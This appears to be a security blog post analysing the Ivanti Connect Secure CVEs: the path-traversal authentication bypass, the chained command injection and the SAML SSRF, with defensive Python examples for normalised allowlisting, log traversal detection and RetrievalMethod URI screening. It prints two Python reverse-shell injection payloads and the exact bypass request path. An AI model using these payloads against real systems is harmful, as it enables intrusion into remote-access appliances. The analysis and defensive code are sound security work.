Ivanti Connect Secure Under Attack: Uncovering Five Exploitable CVEs


February 17, 2024

Overview

Recently, five CVEs have been discovered in Ivanti Connect Secure, a software product designed to offer secure remote access to corporate resources and applications and currently trusted by numerous service providers and government entities. These vulnerabilities encompass authentication bypass, command injection, privilege escalation, server-side request forgery, and XML external entity issues, and they can result in remote code execution on affected systems. The presence of public exploits in the wild raises significant security concerns for users of this product.

According to the Fofa search engine, there are over 20,000 exposed servers, each of which is exploitable if it has not yet been patched.

Orange Tsai shared severity statistics for the CVEs of the most widely used VPN products. Pulse Secure had the lowest rate, and that rate rose at the beginning of this year.

A brief summary of the five vulnerabilities, as shared in the Ivanti knowledge base article, shows that the impact of the threat on companies using the solution is high.

The timeline of the CVE patching and related events shows a gap between discovery and mitigation for the first two CVEs, CVE-2023-46805 and CVE-2024-21887. These CVEs were identified in the second week of December and were exploited in a chain to achieve remote code execution within the victim network. Every exposed server on the public network was therefore at significant risk from the time of discovery until the release of the patches.

CVE-2023-46805 is an authentication bypass in the REST API. It was exploited by requesting /api/v1/cav/client/status/../../admin/options, where the path traversal turns an unauthenticated endpoint into a route to an admin one; this mechanism was described in the Assetnote blog post. The bypass was then chained with CVE-2024-21887, a command injection reachable over several vulnerable endpoints of the Python-based backend server.

;python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())';

The injected payload above is a TCP reverse shell.
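To make the bypass class concrete from the defender's side, here is an added example (written for this post, not Ivanti's code or the Assetnote PoC) that contrasts an allowlist check applied to the raw request path with one applied after normalisation, and then runs a traversal detector over a few constructed access-log lines. The unauthenticated-prefix allowlist and the log lines are constructed for the example; only the /api/v1/cav/client/status/../../admin/options path itself comes from the post.

```python
"""Why a prefix allowlist fails before path normalisation, and how to spot
traversal attempts against API routes in an access log (added example)."""
import posixpath
import re
from urllib.parse import unquote

# Hypothetical allowlist of API prefixes that are reachable without a session.
# Modelled on the endpoint named in the post, not on Ivanti's real route table.
UNAUTH_PREFIXES = ("/api/v1/cav/client/status",)


def is_unauth_vulnerable(path: str) -> bool:
    """Flawed check: matches the prefix on the raw path, so a '..' traversal
    appended after an allowlisted prefix is still treated as unauthenticated."""
    return any(path.startswith(p) for p in UNAUTH_PREFIXES)


def normalize(path: str) -> str:
    """Collapse '.', '..' and duplicate slashes the way the filesystem/router
    will, so that the allowlist decision is made on the effective path."""
    norm = posixpath.normpath(path)
    return norm if norm.startswith("/") else "/" + norm


def is_unauth_hardened(path: str) -> bool:
    """Hardened check: normalise first, then require an exact match or a match
    on a segment boundary (so '/api/v1/cav/client/statusX' does not slip in)."""
    norm = normalize(path)
    return any(norm == p or norm.startswith(p + "/") for p in UNAUTH_PREFIXES)


# Constructed sample access-log lines (Common Log Format); not real traffic.
LOG_LINES = [
    '10.0.0.5 - - [12/Jan/2024:10:00:01 +0000] "GET /api/v1/cav/client/status HTTP/1.1" 200 312',
    '10.0.0.9 - - [12/Jan/2024:10:00:07 +0000] "GET /api/v1/cav/client/status/../../admin/options HTTP/1.1" 200 1024',
    '10.0.0.9 - - [12/Jan/2024:10:00:09 +0000] "GET /api/v1/license/keys-status/ HTTP/1.1" 403 0',
]

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def find_traversal_requests(lines):
    """Return (source_ip, raw_path, effective_path) for every request whose
    decoded path contains a parent-directory segment."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        raw = m["path"].split("?", 1)[0]
        decoded = unquote(raw)  # also catches %2e%2e%2f style encoding
        segments = decoded.split("/")
        if ".." in segments:
            hits.append((m["src"], raw, normalize(decoded)))
    return hits


if __name__ == "__main__":
    traversal = "/api/v1/cav/client/status/../../admin/options"
    print("raw-prefix check lets it through:", is_unauth_vulnerable(traversal))
    print("normalised check rejects it:    ", not is_unauth_hardened(traversal))
    for src, raw, effective in find_traversal_requests(LOG_LINES):
        print(f"traversal from {src}: {raw} -> {effective}")
```

The second function is the one worth keeping in a log-review notebook: a 200 response to a traversal path against the API, especially from the same source that later hits other endpoints, is the pattern to alert on.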

CVE-2024-21893 is a server-side request forgery in the SAML component, reachable when the application uses SAML for authentication. It was exploited by submitting an XML document whose RetrievalMethod element referenced http://127.0.0.1:8090/api/v1/license/keys-status/, so that the server itself fetched that internal URL and triggered the vulnerability.

As shown in the PoC below:

The attacker_server variable is set to http://attackerserver+;python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("serverip",port));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'; so that a reverse shell is returned to the given server host and port.
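The SSRF described above exists because the SAML signature verifier dereferences whatever URI a RetrievalMethod element carries. The added example below (mine, not Ivanti's code or any published PoC) screens those URIs before any verification code is allowed to fetch them: same-document references are accepted, anything else must be HTTPS to an explicitly allowlisted host, and loopback, private and link-local addresses are always refused. The SAML response is a constructed sample; only the loopback URL it carries comes from the post.

```python
"""Screen ds:RetrievalMethod URIs in a SAML message before dereferencing
(added example, defensive policy check only)."""
import ipaddress
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

DS_NS = "http://www.w3.org/2000/09/xmldsig#"

# Constructed SAML response; the RetrievalMethod URI is the loopback target
# named in the post.
SAMPLE_XML = f"""<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
                xmlns:ds="{DS_NS}">
  <ds:Signature>
    <ds:KeyInfo>
      <ds:RetrievalMethod URI="http://127.0.0.1:8090/api/v1/license/keys-status/"/>
    </ds:KeyInfo>
  </ds:Signature>
</samlp:Response>"""


def extract_retrieval_uris(xml_text: str):
    """Collect every ds:RetrievalMethod URI anywhere in the document.
    (Stdlib expat does not fetch external entities, but production code
    should still parse untrusted SAML with defusedxml to shut off XXE.)"""
    root = ET.fromstring(xml_text)
    return [el.get("URI", "") for el in root.iter(f"{{{DS_NS}}}RetrievalMethod")]


def is_safe_retrieval_uri(uri: str, allowed_hosts=()) -> bool:
    """Policy: '#id' same-document references are fine; absolute URLs must be
    https to an allowlisted host, and IP literals that are loopback, private,
    link-local or reserved are rejected even if someone allowlists them."""
    if uri.startswith("#"):
        return True
    parts = urlparse(uri)
    if parts.scheme != "https" or not parts.hostname:
        return False
    host = parts.hostname
    try:
        ip = ipaddress.ip_address(host)
        if ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_reserved:
            return False
    except ValueError:
        pass  # a DNS name, not an IP literal; allowlist decides below
    return host in allowed_hosts


def screen_saml(xml_text: str, allowed_hosts=()):
    """Return (uri, verdict) pairs; the caller rejects the whole message if any
    verdict is False, before handing it to the signature library."""
    return [(u, is_safe_retrieval_uri(u, allowed_hosts))
            for u in extract_retrieval_uris(xml_text)]


if __name__ == "__main__":
    for uri, ok in screen_saml(SAMPLE_XML):
        print(("accept" if ok else "REJECT"), uri)
```

A hostname allowlist still leaves DNS rebinding open, so the fetch itself should resolve the name once, re-check the resulting address with the same ipaddress rules, and connect to that address rather than re-resolving.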

Mitigation

The advisory recommends that customers factory reset their devices and apply the patches.

Conclusion

As this post shows, nothing can be considered entirely secure, even seemingly robust applications. Companies must take a proactive approach, with regular security code reviews, to identify vulnerabilities before attackers exploit them to the detriment of customers. It is worth highlighting that Ivanti, used by governments and service providers, is particularly exposed, which places those entities in a critical position. In cybersecurity, absolute security does not exist, so continual effort and diligence are needed to guard against potential threats and protect the interests of both companies and customers.

References:

https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/?ref=labs.watchtowr.com

https://labs.watchtowr.com/welcome-to-2024-the-sslvpn-chaos-continues-ivanti-cve-2023-46805-cve-2024-21887

https://orangecyberdefense.com/fileadmin/general/pdf/Ivanti_Connect_Secure_-_Journey_to_the_core_of_the_DSLog_backdoor.pdf

https://www.cisa.gov/news-events/directives/ed-24-01-mitigate-ivanti-connect-secure-and-ivanti-policy-secure-vulnerabilities#SupplementalDirectionV1
